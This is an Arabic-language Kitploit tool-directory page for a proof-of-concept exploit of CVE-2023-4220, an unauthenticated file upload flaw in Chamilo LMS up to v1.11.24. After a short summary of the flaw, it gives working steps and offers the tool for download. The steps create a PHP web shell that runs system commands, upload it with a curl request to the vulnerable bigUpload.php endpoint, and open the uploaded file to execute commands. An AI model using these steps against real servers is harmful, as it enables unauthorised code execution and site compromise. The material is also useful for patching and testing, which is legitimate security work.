Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — استغلال إثبات المفهوم لـ CVE-2023-4220: رفع ملف غير مصادق عليه في Chamilo LMS يتيح XSS مخزنة وتنفيذ التعليمات البرمجية عن بُعد عبر نشر قشرة ويب. | Kitploit
أدوات/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

استغلال إثبات المفهوم لـ CVE-2023-4220: رفع ملف غير مصادق عليه في Chamilo LMS يتيح XSS مخزنة وتنفيذ التعليمات البرمجية عن بُعد عبر نشر قشرة ويب.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودعالموقع الإلكتروني
1منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

رفع-الملفات-غير-المصادق-عليه-في-Chamilo-LMS-

رفع الملفات غير المقيد في وظيفة رفع الملفات الكبيرة في /main/inc/lib/javascript/bigupload/inc/bigUpload.php في Chamilo LMS <= v1.11.24 يسمح للمهاجمين غير المصادق عليهم بتنفيذ هجمات البرمجة النصية عبر المواقع المخزنة والحصول على تنفيذ التعليمات البرمجية عن بُعد عبر رفع شل ويب.

الإصدار المتأثر ≤v1.11.24

معرف CVE CVE-2023-4220

ملخص الثغرة

تسمح وظيفة رفع الملفات الكبيرة عبر /main/inc/lib/javascript/bigupload/inc/bigUpload.php برفع ملفات عشوائية إلى الدليل /main/inc/lib/javascript/bigupload/files داخل جذر الويب.

إثبات المفهوم
  • إذا كان الدليل /main/inc/lib/javascript/bigupload/files موجودًا، يمكننا رفع ملف عشوائي كالتالي:

  • إنشاء ملف php ضار echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • ثم يمكننا رفع هذا الملف عن طريق إصدار الأمر التالي

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • يمكننا التحقق من رفع ملفنا عن طريق زيارة الدليل /main/inc/lib/javascript/bigupload/files Untitled (1).png

  • ويمكننا تنفيذه بالنقر على ملف php، والذي يعطي مخرجات أمر whoami Untitled (1).png

تنزيل الأداة